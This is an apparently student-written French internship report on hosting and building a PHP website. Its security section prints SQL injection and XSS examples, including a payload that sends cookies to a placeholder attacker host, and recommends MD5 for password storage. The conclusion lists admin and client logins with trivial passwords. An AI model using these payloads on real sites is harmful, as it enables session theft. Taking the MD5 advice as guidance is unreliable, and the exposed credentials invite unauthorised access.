III. Besoins non fonctionnels ...............................................................................................8 IV. Diagramme de cas d’utilisation ......................................................................................8
  • 4. V. Conclusion......................................................................................................................9 Chapitre 4 : Conception.......................................................................................................................10 I. Introduction ..................................................................................................................10 II. Diagramme de séquence ..............................................................................................10 III. Diagramme de classe....................................................................................................11 IV. Conclusion....................................................................................................................12 Chapitre 5 : Tâches Effectuées............................................................................................................13 I. Introduction ..................................................................................................................13 II. Configuration de l’hébergement web ..........................................................................13 1. Réserver le nom du domaine..................................................................................13 2. FTP.........................................................................................................................14 3. Mail ........................................................................................................................14 4. Base des données....................................................................................................14 5. Autres Tâches.........................................................................................................14 III. Réalisation....................................................................................................................15 1. Partie principale .....................................................................................................15 2. Partie Administrateur .............................................................................................16 3. Partie Client............................................................................................................17 IV. Sécurité du site .............................................................................................................15 1. Faille Injection SQL...............................................................................................18 2. Faille XSS ..............................................................................................................18 3. Cryptage des données.............................................................................................19 V. Conclusion....................................................................................................................19 Conclusion générale .............................................................................................................................20 Bibliographie et Nétographie .............................................................................................................21 Annexe...................................................................................................................................................22
  • 5. Liste des figures Table des Figures Figures 1 : diagramme de cas d’utilisation ................................................................................ 9 Figures 2 : diagramme de séquence ........................................................................................ 10 Figures 3 : diagramme de classe ............................................................................................. 11 Figures 4 : réservation nom du domaine ................................................................................. 13 Figures 5 : Envoyé les fichiers avec Filezilla .......................................................................... 14 Figures 6 : Base des données PhpMyAdmin ........................................................................... 15 Figures 7 : site web en partie principale .................................................................................. 16 Figures 8 : authentification des administrateurs ...................................................................... 16 Figures 9 : tableau de bord pour les administrateurs .............................................................. 17 Figures 10 : Panneau de contrôle pour les clients......................................................................... 17
  • 6. Introduction générale Stage de Perfectionnement Page 1 Introduction générale Dans l’occasion de la période de stage j’examine comment crée une application mobile exactement une version Android, tous les universités et les instituts supérieurs l’étude pratique dans l’étude théorique à partir de stages qui ont la durée des études. Le stage est un moyen qui permet à l’étudiant de s’intégrer dans la vie professionnelle en vue d’avoir une idée générale sur le fonctionnement de l’entreprise. A ce niveau, l’objectif des instituts supérieurs des études technologies est de permet à l’étudiant d’enrichir ses connaissances et de s’adapter à l’environnement de l’entreprise. En effet, mon stage d’ouvrir m’a permis l’occasion de s’intégrer au sien de la vie professionnelle et d’élargir mes connaissances. Finalement, l’objectif de ce stage est de faire une intervention pratique qui me permet d’appliquer mes connaissances scientifiques et techniques relatives au domaine de l’informatique, et de tester mes facultés d’analyse et de synthèse.
  • 7. Chapitre 1 : Présentation du cadre du stage Stage de Perfectionnement Page 2 Chapitre 1 : Présentation du cadre du stage I. Introduction Dans ce chapitre, nous allons présenter en premier lieu la société dans laquelle nous avons effectué notre sujet de travail proposé tout en expliquant ses objectifs ainsi les fonctionnalités nécessaires pour le réaliser. II. Présentation de la société EL BOOTIC est une société spécialisée dans le commerce et la maintenance du matériel informatique, ainsi que dans le développement des logiciels et applications informatiques. EL BOOTIC a été créée le 20 mai 2000 par hatem ayed sous forme de société à responsabilité limitée (SARL). Grâce à la volonté qui anime l’équipe pour fournir les meilleurs services aux clients et la qualité du matériel informatique, EL BOOTIC a rapidement pris sa place sur le marché. Leurs activités sont diverses : vente matériels et accessoires informatiques, maintenance et réparation matériels informatiques et pièces électroniques, développement de logiciels, création des sites WEB, assistance des entreprises. Le stage s’est effectué en précisant sa vocation du développement un site web moderne, efficace, et dans période exacte Son adresse est Av hbib bourguiba Ksibet El Medyouni 5031 III. Contexte du stage Dans l’objectif de maitriser et approfondir nos connaissances déjà acquises, la société el bootic nous a accueillis dans ces locaux. Elle nous a proposé comme sujet de suivre des formations sur les outils bureautiques et approfondir les connaissances dans le développement mobile. Les formations proposées par la société :  Création un site web dynamique & hébergée
  • 8. Chapitre 1 : Présentation du cadre du stage Stage de Perfectionnement Page 3 Les formations consistent à connaitre les différentes fonctionnalités de ces outils, bien maitrisés ces connaissances à l’aide des exemples et des travaux pratiques. IV. Conclusion A travers ce chapitre, nous avons présenté le cadre du projet, identifié à atteindre et le travail à faire. Compte tenu de cela, nous proposant les détails du travail dans le chapitre suivant.
  • 9. Chapitre 2 : Notations théoriques Stage de Perfectionnement Page 4 Chapitre 2 : Notions théoriques I. Introduction Avant de commencer le travail, nous présentons quelques notions théoriques utilise dans mon stage. Tout d'abord, nous identifions les mots importants, Cela m'a aidé à compléter le travail requis et les mots techniques au cadre de stage. II. Hébergement 1. Définition Est une entité ayant pour vocation de mettre à disposition des internautes des sites web conçus et gérés par des tiers. Il donne ainsi accès à tous les internautes au contenu déposé dans leurs comptes par les webmestres souvent via un logiciel FTP ou un gestionnaire de fichiers. Pour cela, il maintient des ordinateurs allumés et connectés 24 heures sur 24 à Internet (des serveurs web par exemple) par une connexion à très haut débit (plusieurs centaines de Mb/s), sur lesquels sont installés des logiciels : serveur HTTP (souvent Apache), serveur de messagerie, de base de données... 2. Types  Les hébergements partagés ou mutualisés : Chaque serveur héberge plusieurs sites, jusqu'à plusieurs milliers, et ce dans le but de mutualiser les coûts. Le principal avantage est le prix, le principal inconvénient est que le client mutualisé n'est pas l'administrateur du serveur, il est donc souvent tributaire du bon vouloir de l'hébergeur s'il souhaite une technologie particulière.  Les hébergements dédiés : Le client dispose alors de son propre serveur, et peut en général l'administrer comme il le souhaite, ce qui est le principal avantage de ce type d'offre. Le fournisseur du serveur reste cependant propriétaire du serveur. Les inconvénients sont : le prix
  • 10. Chapitre 2 : Notations théoriques Stage de Perfectionnement Page 5 beaucoup plus élevé que les hébergements mutualisés, et le besoin de compétences pour administrer la machine correctement.  L'hébergement virtuel dédié via un hyperviseur qui offre au client la souplesse d'un dédié (le client administre sa machine à sa convenance) en lui fournissant une machine virtuelle qui utilise une partie des ressources d'un serveur (physique) par des techniques de virtualisation (informatique).  Les hébergements dédiés dits « managés », avec « serveur dédié info géré » ou « clés en main » : Le client dispose de son propre serveur mais les techniciens de l'hébergeur s'occupent de sa gestion système. Cette solution est parfaite si vous n'avez aucune connaissance technique sur son administration. Il suffit simplement de déposer son site. Ce type d'hébergement cherche à s'adapter aux besoins. 3. Exemples des hébergeurs  OVH  1and1  Gandi  One  Ikola  Lws  Hostgator  Etc… III. Référencement web 1. Définition C’est l’identifier le site dans les moteurs des recherches, c’est-à-dire l’indexation les pages. 2. Types  Le référencement naturel, il est directement en lien avec les contenus de votre site. Votre positionnement est le révélateur de la bonne compréhension de vos contenus par les moteurs de recherche.  Le référencement manuel est la deuxième clef de votre succès sur internet. Votre position sur Google dépend de votre popularité
  • 11. Chapitre 2 : Notations théoriques Stage de Perfectionnement Page 6 mesurée notamment par le nombre de liens de qualité qui pointent vers votre site. D'où la nécessité du référencement manuel.  Le référencement publicitaire, ce sont des liens mis en place depuis des bannières publicitaires, les adwords, les animations, les jeux, les buzz.  Le référencement de localisation (Google maps), il favorisera toutes les requêtes effectuées sur des critères géographiques. IV. Les failles web 1. Définition Une faille c'est en fait une faiblesse dans un code qui peut être exploitée pour détourner un site de sa fonction première. Le pirate va pouvoir récupérer des données confidentielles (comme les infos personnelles des inscrits) ou modifier le comportement du site. Mais heureusement pour nous, il est possible de se protéger de ces fameuses failles. 2. Type des failles  L’injection SQL : L'injection SQL est une méthode d'attaque très fréquemment utilisée dans le monde du hack. Elle consiste à modifier une requête SQL en injectant des morceaux de code non-filtrés, généralement par le biais d'un formulaire.  La faille include : à faille include est également très dangereuse. Comme son nom l'indique, elle exploite une mauvaise utilisation de la fonction include(). Cette fonction est très souvent utilisée pour exécuter du code PHP se situant dans une autre page, et particulièrement pour la connexion à une base de données.  La faille upload : La faille upload est une des failles les plus dangereuses. Vous connaissez sûrement la balise HTML qui permet l'upload de fichier  La faille XSS : (plus officiellement appelée Cross-Site Scripting) est une faille permettant l'injection de code HTML ou JavaScript dans des variables mal protégées.  CSRF : Cross site request forgery  CRLF : Carriage Return Line Feed  Etc.
  • 12. Chapitre 2 : Notations théoriques Stage de Perfectionnement Page 7 V. Outils du développement 1. PHP HyperText Preprocessor, plus connu sous son sigle PHP (acronyme récursif), est un langage de programmation libre principalement utilisé pour produire des pages Web dynamiques via un serveur HTTP, mais pouvant également fonctionner comme n'importe quel langage interprété de façon locale. PHP est un langage impératif orienté objet comme C++. PHP a permis de créer un grand nombre de sites web célèbres, comme Facebook, YouTube, Wikipedia, etc. Il est aujourd'hui considéré comme la base de la création des sites Internet dits dynamiques. 2. SQL Sigle de « Structured Query Language », en français langage de requête structurée est un langage informatique normalisé servant à exploiter des bases de données relationnelles. La partie langage de manipulation des données de SQL permet de rechercher, d'ajouter, de modifier ou de supprimer des données dans les bases de données relationnelles. 3. JavaScript et Jquery JavaScript est un langage de programmation de scripts principalement employé dans les pages web interactives mais aussi pour les serveurs. 4. Bootstrap Bootstrap est un framework front-end (HTML5, CSS et JavaScript) spécialement conçu pour le développement d'application web "responsive", c'est-à-dire qui s’adapte automatiquement à différents dispositifs et tailles d'écran (desktop, tablettes, smartphones, ...). VI. Conclusion Dans ce chapitre nous avons eu sur certains mots clés que j’ai utilisés dans le stage et en cours de la création d’application. Quelle sont c'est tâches ?
  • 13. Chapitre 3 : Spécification des besoins Stage de Perfectionnement Page 8 Chapitre 3 : Spécification des besoins I. Introduction Pendant la période de mon stage j'ai fait des tâches, qui sont généralement de création une application mobile de la société. Pour cela je définirai les tâches, qu'on j'ai fait durant la période de stage. II. Besoins fonctionnels Avant la création de l’application il faut définir quelques besoins fonctionnels sont généralement  Partie pour les administrateurs  Partie pour les clients  Sécurité  Vend en ligne  Synthèse statistique III. Besoins non fonctionnels Les besoins non fonctionnels décrivent toutes les contraintes auxquelles est soumis le système pour sa réalisation et son bon fonctionnement.  Ergonomie et souplesse  Rapidité  Efficacité IV. Diagramme de cas d’utilisation
  • 14. Chapitre 3 : Spécification des besoins Stage de Perfectionnement Page 9 Figure 1 : diagramme de cas d’utilisation V. Conclusion Dans ce chapitre on a présenté une étude du système existant, les lacunes qu’il comprend ainsi que les solutions que nous proposons pour pallier ces problèmes, nous avons aussi cité les besoins fonctionnels et non fonctionnels qui sont indispensables pour mieux faciliter le travail à réaliser. Dans le chapitre suivant nous allons aborder l’étude conceptuelle de notre site, tout en mentionnant tous les scénarios possibles, les acteurs, les diagrammes.
  • 15. Chapitre 4 : Conception Stage de Perfectionnement Page 10 Chapitre 4 : Conception I. Introduction Ce chapitre a pour objectif de présenter la solution conceptuelle proposée. En d’autres termes, ce chapitre devrait répondre à la question comment faire. La conception est décrite par un ensemble de diagrammes relevant soit du langage de modélisation UML. II. Diagramme de séquence Figure 2 : Diagramme de séquence
  • 16. Chapitre 4 : Conception Stage de Perfectionnement Page 11 III. Diagramme de classe Figure 3 : Diagramme de classe
  • 17. Chapitre 4 : Conception Stage de Perfectionnement Page 12 IV. Conclusion En clair, comme nous venons de le voir, ce chapitre était consacré, à la conception des diagrammes, de séquence qui nous ont permis de dégager l'architecture générale de notre application représentée ici par ce diagramme de classe qui nous renseigne sur la relation homme Machine de notre application qui sera détaillée dans le prochain chapitre.
  • 18. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 13 Chapitre 5 : Tâches Effectuées I. Introduction Après avoir placé notre projet dans son cadre général, une étape indispensable serait de présenter l’environnement sur lequel se base l’application. Dans ce chapitre, nous allons présenter les outils bureautiques tels que les notions des hébergements web étudié pour améliorer, élargir et bien maitriser nos connaissances. II. Configures de l’Hébergement Web 1. Réserver nom du domaine Dans cadre de stage en va réserver un nom du domaine, tout d’abord je recherche un nom existe, c’est-à-dire le nom n’est pas réserver Exemple.com … Réserver Devarabe.com …n’est pas réservé donc j’acheté. Je utilisé www.whois.com Figure 4 : réservation nom du domaine
  • 19. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 14 2. FTP Après le commander l’hébergement, je crée des comptes FTP (File Transfer Protocol). Ce service permet d’envoi les grands fichiers au serveur du site facilement, par suite je envoyé les fichiers en utilise logiciel Filezilla Figure 5 : Envoyé les fichiers avec Filezilla 3. Mail L’hébergeur offre des nombres des comptés mail et une interface pour contrôle les emails. Il existe plusieurs applications web pour les emails, mais généralement en utilisent  Roundcube  Horde  SquirrelMail 4. Base des données
  • 20. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 15 Pour chaque hébergeur ou par un offre d’hébergement, l’hébergeur donnée un nombre des basées des données (1, 2, 3 ou illimité). J’obtenue 5 basés qui travaille avec phpmyadmin en utilise langage SQL, tout d’abord création du tables et liée entre eux. Lorsque j’installe WordPress les tables créent automatiquement au sien de l’interruption du script d’installation WordPress. Figure 6 : base des données PhpMyAdmin 5. Autre Tâches Au cours de configurations de l’hébergement, je modifie le mot de passe de contrôle panel qui je réservoir à partir de l’hébergement, je respect des normes lorsque en crée le mot de passe comme l’utilisation des caractères minuscule & majuscule, des chiffres et des symboles. Ainsi que je crée les sous domaine c’est-à-dire une racine de site comme suit SOUS_DOMAINE.NOM_SITE.COM. Puis je modifier les paramètres du DNS pour le pointage sur domaine, autrement l’hébergeur fait lé automatiquement. III. Réalisation 1. Partie Principale
  • 21. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 16 C’est la partie accessible par tous les visiteurs du site web, qui en trouvent les informations de la société. Figure 7 : site web en partie principale 2. Partie Administrateur Figure 8 : authentification des administrateurs
  • 22. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 17 Figure 9 : tableau de bord pour les administrateurs 3. Partie Client Figure 10 : Panneau de contrôle pour les clients
  • 23. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 18 IV. Sécuriste du site 1. Faille Injection SQL Cette faille apparaît quand il est possible d'injecter du code SQL dans les requêtes SQL qui sont faites dans une page web. C'est actuellement la "meilleure" vulnérabilité Web en rapport fréquence/surface d'exploitation. Les conséquences d'une faille SQL peuvent être multiples, du contournement de formulaires d'authentification au dump complet de la base de données en passant par l'exécution arbitraire de code. Dans ce premier article, nous allons essayer de nous familiariser avec des injections simples (appelées aussi injections du premier ordre). Exemple : ‘ OR 1=1 OR ‘’=’ Premièrement, le plus important, filtrer les variables dans les formulaires. Moi personnellement j'utilise une fonction PHP qui me permet de savoir s'il y a un espace ou tous autres caractères spéciaux non désirés. Il est aussi important de préciser que si vous protéger votre formulaire par une fonction JavaScript un pirate va recopier votre formulaire et exploiter en local rien de plus facile, alors à ne pas faire. 2. Faille XSS Il existe en fait deux type de XSS :  Le XSS réfléchi (non permanent)  Le XSS stocké (permanent) Exemple : <SCRIPT>ALERT('IL Y A UNE FAILLE XSS')</SCRIPT> Exemple : <IMG SRC="AZERTY.JPG" ONERROR="WINDOW.LOCATION='HTTP://WWW.SITE_DU_HACKER.COM/RECUPERATION_COOKI E.PHP?COOKIE='+DOCUMENT.COOKIE;"> La solution la plus adaptée contre cette faille est d'utiliser la fonction HTMLSPECIALCHARS(). Cette fonction permet de filtrer les symboles du type <, & ou encore ", en les remplaçant par leur équivalent en HTML. Par exemple :  Le symbole & devient &amp;  Le symbole " devient &quot;  Le symbole ' devient &#39;
  • 24. Chapitre 5 : Tâches Effectuées Stage de Perfectionnement Page 19 $PSEUDO = HTMLSPECIALCHARS ($_POST ['PSEUDO']); 3. Cryptage des données Dans la base des données l’insertion des données et sur tout la colonne de mot de passe sera crypte avec la fonction MD5() pour assurer bien la sécurité des comptes des administrateurs et leurs clients V. Conclusion Dans le chapitre réalisation nous avons appelé à présenter les interfaces réalisé dans notre site web pour clarifier les étapes d’utilisation de notre site avec ses deux parties statique et dynamique.
  • 25. Conclusion générale Page 20 Conclusion générale Ce travail a été réalisé dans le cadre de notre stage de perfectionnement de un mois au sein de Institué Supérieur des Etudes Technologique de Mahdia Durant notre stage nous a été bénéfique bien sur le plan théorique que pratique. Ce stage été une bonne occasion pour élargir mes connaissances pratiques pour s’adapter aux nouvelles technologies qui s’améliorent jour pour persister dans un secteur qui s’éveille chaque jour sur des nouvelles innovations. Le projet m’a également donnée l’occasion de mieux de la société de service informatique, leur fonctionnement en interne et vis-à-vis des clients, c’est un milieu qu’il est utile d’appréhender pour débuter sa carrière en tant que développeur. En guise de perspective, une formation techniques d’hébergement sera très intéressent pour suivre les améliorations technologiques, des connaissances en accès seront bien complémentaire à mes connaissances. Pour voir le site : www.lelkol.net/StageDePerfectionnement/ Administrateur : www.lelkol.net/StageDePerfectionnement/admin/ Login : med pass : 123456 Client: www.lelkol.net/StageDePerfectionnement/client/ Login : med pass : azerty
  • 26. Bibliographie et Nétographie Stage de Perfectionnement Page 21 Bibliographie et Nétographie [1] Sylvain Baudoin. « Télécharger Comment Héberger Son Site Web Chez Soi », Paris, 2008, 200p [2] Damien Nouvel. « Création de site web Hébergement de site web », Paris, 2005, 53p [3] Christophe AUBRY. « WordPress 4Un CMS pour créer et gérer blogs et sites Web »,473p [4] Patrick Zemour. « Le guide pratique WordPress Créez et animez vos blogs et sites web », 2012,154p [5] http://guides.ovh.com/ : guide d’utilisation l’hébergeur OVH [6] http://getbootstrap.com/: base des connaissances sur Bootstrap [7] http://www.w3schools.com/bootstrap/: Exemple en ligne en utilisent Bootstrap [8] https://openclassrooms.com/courses/protegez-vous-efficacement-contre-les-failles-web: Tutorial sur les failles web. [9] http://fr.wikipedia.org/wiki/Hébergeur_web : Hébergeur web [10] http://fr.wikipedia.org/wiki/CPanel : Cpanel [11] http://www.networking4all.com/fr/support/certificats+ssl/manuels/cpanel/ : Cpanel [12] http://fr.wikipedia.org/wiki/Hébergement_mutualisé : hébergement mutualisé [13] http://openclassrooms.com/courses/ameliorez-la-visibilite-de-votre-site-grace-au- referencement : Améliorez la visibilité de votre site grâce au référencement [14] http://www.w3c2i.com/faqs/differents-types-de-referencement.html : DIFFÉRENTS TYPES DE RÉFÉRENCEMENT [15] http://www.bases-hacking.org/failles-web.html : Les failles web
  • 27. ANNEXE Stage de Perfectionnement Page 22 Liste des annexes : Annexe 1 : Facture d’hébergement Annexe 2 : Création Base des données sur serveur Annexe 3 : Structure de base des données
  • 28. Annexe 1 : Facture d’hébergement
  • 29. Annexe 2 : Création Base des données sur Serveur
  • 30. Annexe 3 : Structure de la Base des données